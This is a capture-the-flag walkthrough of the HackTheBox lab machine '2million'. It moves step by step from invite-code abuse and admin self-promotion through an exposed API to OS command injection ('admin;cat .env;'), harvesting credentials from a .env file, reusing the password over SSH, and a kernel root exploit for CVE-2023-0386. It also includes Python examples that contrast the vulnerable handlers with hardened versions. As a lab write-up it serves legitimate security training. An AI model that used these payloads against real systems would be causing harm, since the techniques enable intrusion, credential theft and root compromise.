- Using Guided mode
- Retired Free Machine

It has been a while, so this is a bit of a warm-up.
nmap
```
└─$ nmap 10.10.11.221
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-06-07 09:36 JST
Nmap scan report for 10.10.11.221
Host is up (0.25s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

Nmap done: 1 IP address (1 host up) scanned in 666.89 seconds
```
Web server
```
~/dev/hack 🐶💭❯ curl --verbose http://10.10.11.221
*   Trying 10.10.11.221:80...
* Connected to 10.10.11.221 (10.10.11.221) port 80
...
< HTTP/1.1 301 Moved Permanently
< Server: nginx
...
< Location: http://2million.htb/
```
It redirects, so the server expects to be addressed by the virtual host `2million.htb`.
```
~/dev/hack 🐶💭❯ cat /etc/hosts | tail -n 1
10.10.11.221 2million.htb
```
Fiddling with everything else was a hassle, so I just added it to /etc/hosts.

With the correct Host header the site loads; it only redirects requests that arrive without that host name.
Registration is via /invite.
/js/inviteapi.min.js
Slightly tricky: the script is assembled with `eval`. The resulting functions end up in global scope, so they can be called directly from the browser console.
```
makeInviteCode()
undefined
Object { 0: 200, success: 1, data: {…}, hint: "Data is encrypted ... We should probbably check the encryption type in order to decrypt it..." }
```
`makeInviteCode()` is the one to call, I think. Decoding the `data` field as the hint suggests gives:
In order to generate the invite code, make a POST request to /api/v1/invite/generate
```
~/dev/hack 🐶💭❯ curl -X POST http://2million.htb/api/v1/invite/generate
{"0":200,"success":1,"data":{"code":"RjIxNkktMzRaRkwtTVFBTUQtMjFMQTg=","format":"encoded"}}%
```
The code is Base64; decoding it (CyberChef or `base64 -d`) gives `F216I-34ZFL-MQAMD-21LA8`.
After logging in, look for the Connection Pack. It is presumably VPN-related, and sure enough it is under Access:
GET /api/v1/user/vpn/generate
Requesting http://2million.htb/api/v1 returns a JSON listing of the whole API, which has carelessly been left exposed and includes the admin endpoints.
PUT /api/v1/admin/settings/update "Update user settings"
This one looks suspicious, but first let's see how the auth endpoints behave.
GET /api/v1/user/auth
GET /api/v1/admin/auth
Using user/auth as a reference, probe admin/auth. The session is carried in the PHPSESSID cookie, so:
```
$ curl -b "PHPSESSID=q6hg3iq5ph49gbcnambvmuel77" http://2million.htb/api/v1/user/auth
{"loggedin":true,"username":"skyriser","is_admin":0}
$ curl -b "PHPSESSID=q6hg3iq5ph49gbcnambvmuel77" http://2million.htb/api/v1/admin/auth
{"message":false}
```
Now send a plausible-looking request to the update endpoint:
```
$ curl -b "PHPSESSID=q6hg3iq5ph49gbcnambvmuel77" http://2million.htb/api/v1/admin/settings/update -XPUT -H 'Content-Type: application/json' -d '{"username":"skyriser","is_admin":"1"}' --verbose
...
* Connection #0 to host 2million.htb left intact
{"status":"danger","message":"Missing parameter: email"}
```
It accepts JSON, and the error is a validation error ("missing parameter"), not an authorization error: a non-admin session reached the admin endpoint's parameter handling. So let's just supply the missing field and make ourselves admin.

(I also poked around the admin UI afterwards, but nothing there seems relevant.)
```
$ curl -b "PHPSESSID=q6hg3iq5ph49gbcnambvmuel77" http://2million.htb/api/v1/admin/settings/update -XPUT -H 'Content-Type: application/json' -d '{"username":"skyriser","is_admin":1,"email":"skyriser@example.com"}' --verbose
{"id":15,"username":"skyriser","is_admin":1}
$ curl -b "PHPSESSID=q6hg3iq5ph49gbcnambvmuel77" http://2million.htb/api/v1/admin/auth
{"message":true}
```
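To make the bug behind that exchange concrete, here is an added example (not the box's PHP, whose source is never shown in this post): a minimal model of what the observed behaviour of `PUT /api/v1/admin/settings/update` implies, beside a hardened version. The session store, the user table, the ids and e-mail addresses, and all function names are assumptions made for the example.

```python
# Added example, not the box's source code: a model of the observed
# behaviour of PUT /api/v1/admin/settings/update beside a hardened version.
# Session store, user table and function names are assumptions.

from typing import Optional

REQUIRED = ("username", "email")

# Constructed session store: PHPSESSID value -> username.
SESSIONS = {"q6hg3iq5ph49gbcnambvmuel77": "skyriser"}


def make_users() -> dict:
    """Constructed sample user table (ids and e-mails are made up)."""
    return {
        "skyriser": {"id": 15, "username": "skyriser",
                     "email": "skyriser@example.com", "is_admin": 0},
        "admin": {"id": 1, "username": "admin",
                  "email": "admin@2million.htb", "is_admin": 1},
    }


def current_user(cookie: dict, users: dict) -> Optional[dict]:
    """Resolve the PHPSESSID cookie to a user record, or None."""
    name = SESSIONS.get(cookie.get("PHPSESSID", ""))
    return users.get(name) if name else None


def admin_auth(cookie: dict, users: dict) -> dict:
    """Model of GET /api/v1/admin/auth: reports the caller's is_admin flag."""
    user = current_user(cookie, users)
    return {"message": bool(user and user["is_admin"])}


def update_settings_vulnerable(cookie: dict, body: dict, users: dict) -> tuple:
    """Behaviour seen on the box: any logged-in session may update any user,
    and is_admin is copied straight from the request body. Only presence of
    a session is checked, never the caller's privilege (mass assignment with
    no authorization check)."""
    if current_user(cookie, users) is None:
        return 401, {"status": "danger", "message": "Unauthorized"}
    for field in REQUIRED:
        if field not in body:
            return 400, {"status": "danger", "message": f"Missing parameter: {field}"}
    target = users.get(body["username"])
    if target is None:
        return 404, {"status": "danger", "message": "User not found"}
    target["email"] = body["email"]
    target["is_admin"] = int(body.get("is_admin", target["is_admin"]))
    return 200, {"id": target["id"], "username": target["username"],
                 "is_admin": target["is_admin"]}


def update_settings_fixed(cookie: dict, body: dict, users: dict) -> tuple:
    """Hardened: authorize on the server-side session (caller must already
    be admin) and copy only allow-listed fields; is_admin never comes from
    the client, so a self-promotion request is a no-op even for admins."""
    caller = current_user(cookie, users)
    if caller is None:
        return 401, {"status": "danger", "message": "Unauthorized"}
    if not caller["is_admin"]:
        return 403, {"status": "danger", "message": "Forbidden"}
    for field in REQUIRED:
        if field not in body:
            return 400, {"status": "danger", "message": f"Missing parameter: {field}"}
    target = users.get(body["username"])
    if target is None:
        return 404, {"status": "danger", "message": "User not found"}
    target["email"] = body["email"]  # the only client-writable field
    return 200, {"id": target["id"], "username": target["username"],
                 "is_admin": target["is_admin"]}


if __name__ == "__main__":
    cookie = {"PHPSESSID": "q6hg3iq5ph49gbcnambvmuel77"}
    users = make_users()
    print(admin_auth(cookie, users))
    print(update_settings_vulnerable(cookie, {"username": "skyriser", "is_admin": "1"}, users))
    print(update_settings_vulnerable(cookie, {"username": "skyriser", "is_admin": 1,
                                              "email": "skyriser@example.com"}, users))
    print(admin_auth(cookie, users))
    print(update_settings_fixed(cookie, {"username": "skyriser", "is_admin": 1,
                                         "email": "x@example.com"}, make_users()))
```

The vulnerable handler reproduces the sequence above: `admin/auth` is false, the first PUT fails only on the missing `email`, the second PUT flips `is_admin`, and `admin/auth` becomes true. The fixed handler rejects the same non-admin session with 403 before it looks at parameters, and even an admin caller cannot set `is_admin` through this route.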
The one endpoint I had not tried yet was this:
POST /api/v1/admin/vpn/generate Generate VPN for specific user
```
$ curl -b "PHPSESSID=q6hg3iq5ph49gbcnambvmuel77" -XPOST http://2million.htb/api/v1/admin/vpn/generate -H 'Content-Type: application/json' -d '{"username":"admin"}'
...
```
That alone hands out other users' OpenVPN configs, which is already a problem. More interesting: the username looks like it is passed unsanitized into something on the filesystem or a shell (my first guess was directory traversal), so a crafted username should let us do something nastier.
```
$ curl -b "PHPSESSID=q6hg3iq5ph49gbcnambvmuel77" -XPOST http://2million.htb/api/v1/admin/vpn/generate -H 'Content-Type: application/json' -d '{"username":"admin;ls;"}'
Database.php
Router.php
VPN
assets
controllers
css
fonts
images
index.php
js
views
```
It worked. The `;` terminated whatever command the generator runs and the rest executed, so this is OS command injection, not traversal.
```
$ curl -b "PHPSESSID=q6hg3iq5ph49gbcnambvmuel77" -XPOST http://2million.htb/api/v1/admin/vpn/generate -H 'Content-Type: application/json' -d '{"username":"admin;whoami;"}'
www-data
$ curl -b "PHPSESSID=q6hg3iq5ph49gbcnambvmuel77" -XPOST http://2million.htb/api/v1/admin/vpn/generate -H 'Content-Type: application/json' -d '{"username":"admin;ls -la;"}'
total 56
drwxr-xr-x 10 root root 4096 Jun  8 02:40 .
drwxr-xr-x  3 root root 4096 Jun  6  2023 ..
-rw-r--r--  1 root root   87 Jun  2  2023 .env
-rw-r--r--  1 root root 1237 Jun  2  2023 Database.php
-rw-r--r--  1 root root 2787 Jun  2  2023 Router.php
drwxr-xr-x  5 root root 4096 Jun  8 02:40 VPN
drwxr-xr-x  2 root root 4096 Jun  6  2023 assets
drwxr-xr-x  2 root root 4096 Jun  6  2023 controllers
drwxr-xr-x  5 root root 4096 Jun  6  2023 css
drwxr-xr-x  2 root root 4096 Jun  6  2023 fonts
drwxr-xr-x  2 root root 4096 Jun  6  2023 images
-rw-r--r--  1 root root 2692 Jun  2  2023 index.php
drwxr-xr-x  3 root root 4096 Jun  6  2023 js
drwxr-xr-x  2 root root 4096 Jun  6  2023 views
```
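What the injection above relies on, and what would have stopped it, as an added example (not the box's code, which we never see): a model of the VPN-generator call that `admin/vpn/generate` evidently makes, beside an argv-only version and an allow-listed version. The real generator script is replaced by `echo` so the example runs offline, and the function names and the username pattern are assumptions.

```python
# Added example, not the box's code: how a username reaches a shell in a
# VPN-config generator, and two hardened forms. `echo` stands in for the
# real generator script so this runs offline; names are assumptions.

import re
import subprocess

# Allow-list: the only shape a username may have before it touches the OS.
USERNAME_RE = re.compile(r"[A-Za-z0-9_.-]{1,32}")


def generate_vpn_vulnerable(username: str) -> str:
    """Command built by string concatenation and run through /bin/sh.
    ';' terminates the intended command and whatever follows runs as the
    web server user, exactly as 'admin;ls;' did on the box."""
    cmd = f"echo generating vpn for {username}"
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


def generate_vpn_argv(username: str) -> str:
    """No shell: with an argv list the username is one opaque argument, so
    ';', '$(...)', backticks and '|' are never interpreted."""
    res = subprocess.run(["echo", "generating vpn for", username],
                         capture_output=True, text=True, check=True)
    return res.stdout


def generate_vpn_fixed(username: str) -> str:
    """Allow-list validation plus argv: reject anything that is not a
    plausible username before it reaches a process at all."""
    if not USERNAME_RE.fullmatch(username):
        raise ValueError(f"invalid username: {username!r}")
    return generate_vpn_argv(username)


if __name__ == "__main__":
    payload = "admin;echo INJECTED;"
    print(generate_vpn_vulnerable(payload), end="")  # second line: INJECTED
    print(generate_vpn_argv(payload), end="")        # payload echoed literally
    try:
        generate_vpn_fixed(payload)
    except ValueError as e:
        print("rejected:", e)
    print(generate_vpn_fixed("admin"), end="")
```

The argv form on its own already defeats the `admin;whoami;` style payload; the allow-list on top of it is what you want in practice, because it also stops the username from being abused as a path component or an option (`-` prefixes) by whatever the generator does next.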
```
$ curl -b "PHPSESSID=q6hg3iq5ph49gbcnambvmuel77" -XPOST http://2million.htb/api/v1/admin/vpn/generate -H 'Content-Type: application/json' -d '{"username":"admin;ls -la /home/admin;"}'
total 32
drwxr-xr-x 4 admin admin 4096 Jun  7 14:18 .
drwxr-xr-x 3 root  root  4096 Jun  6  2023 ..
lrwxrwxrwx 1 root  root     9 May 26  2023 .bash_history -> /dev/null
-rw-r--r-- 1 admin admin  220 May 26  2023 .bash_logout
-rw-r--r-- 1 admin admin 3771 May 26  2023 .bashrc
drwx------ 2 admin admin 4096 Jun  6  2023 .cache
-rw------- 1 admin admin    0 Jun  7 14:18 .lesshsQ
-rw-r--r-- 1 admin admin  807 May 26  2023 .profile
drwx------ 2 admin admin 4096 Jun  6  2023 .ssh
-rw-r----- 1 root  admin   33 Jun  7 08:54 user.txt
```
user.txt is root:admin with mode 640, so www-data cannot read it; we need to become admin.

The lead is the world-readable `.env` in the web root:
```
$ curl -b "PHPSESSID=q6hg3iq5ph49gbcnambvmuel77" -XPOST http://2million.htb/api/v1/admin/vpn/generate -H 'Content-Type: application/json' -d '{"username":"admin;cat .env;"}'
DB_HOST=127.0.0.1
DB_DATABASE=htb_prod
DB_USERNAME=admin
DB_PASSWORD=SuperDuperPass123
```
user.txt
SSH is open, so try that database password against the admin account:
```
$ ssh admin@2million.htb
admin@2million.htb's password:
Welcome to Ubuntu 22.04.2 LTS (GNU/Linux 5.15.70-051570-generic x86_64)
admin@2million:~$ cat user.txt
XXX
```
Straight in. The database password is reused for the admin shell account, so that is the whole user step.
Looking at mail

The next Guided-mode hint is:

What is the email address of the sender of the email sent to admin?

So look at the mail spool:
```
admin@2million:/var/spool/mail$ ls
admin
admin@2million:/var/spool/mail$ pwd
/var/spool/mail
...
Subject: Urgent: Patch System OS
...
There have been a few serious Linux kernel CVEs already this year. That one in OverlayFS / FUSE looks nasty.
```
The mail is telling us the box has an unpatched kernel.

- CVE-2023-0386

This looks like the one: it is the OverlayFS/FUSE bug, it is a local privilege escalation, and the SSH banner above showed kernel 5.15.70, which predates the fix.
Privilege escalation

I used this public PoC for it.
```
$ scp CVE-2023-0386-main.zip admin@2million.htb:/home/admin/
admin@2million.htb's password:
CVE-2023-0386-main.zip                        100%   11KB  30.6KB/s   00:00
```
```
admin@2million:~$ ls
CVE-2023-0386-main.zip  user.txt
admin@2million:~$ unzip CVE-2023-0386-main.zip
Archive:  CVE-2023-0386-main.zip
acc49811a9083381c28db9ec296774e6a82be419
   creating: CVE-2023-0386-main/
  inflating: CVE-2023-0386-main/Makefile
  inflating: CVE-2023-0386-main/README.md
  inflating: CVE-2023-0386-main/exp.c
  inflating: CVE-2023-0386-main/fuse.c
  inflating: CVE-2023-0386-main/getshell.c
   creating: CVE-2023-0386-main/ovlcap/
 extracting: CVE-2023-0386-main/ovlcap/.gitkeep
   creating: CVE-2023-0386-main/test/
  inflating: CVE-2023-0386-main/test/fuse_test.c
  inflating: CVE-2023-0386-main/test/mnt
  inflating: CVE-2023-0386-main/test/mnt.c
```

Build it with the included Makefile (build output not shown), then run the two halves in separate terminals:
```
# Term 1
admin@2million:~/CVE-2023-0386-main$ ./fuse ./ovlcap/lower ./gc
[+] len of gc: 0x3ee0
[+] readdir
...
```
```
# Term 2
admin@2million:~/CVE-2023-0386-main$ ./exp
uid:1000 gid:1000
[+] mount success
total 8
drwxrwxr-x 1 root   root    4096 Jun  8 03:17 .
drwxrwxr-x 6 root   root    4096 Jun  8 03:17 ..
-rwsrwxrwx 1 nobody nogroup 16096 Jan  1  1970 file
[+] exploit success!
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.

root@2million:~/CVE-2023-0386-main# whoami
root
```
Done.
root.txt
```
root@2million:~# cd /root/
root@2million:/root# pwd
/root
root@2million:/root# ls
root.txt  snap  thank_you.json
root@2million:/root# cat root.txt
XXX
```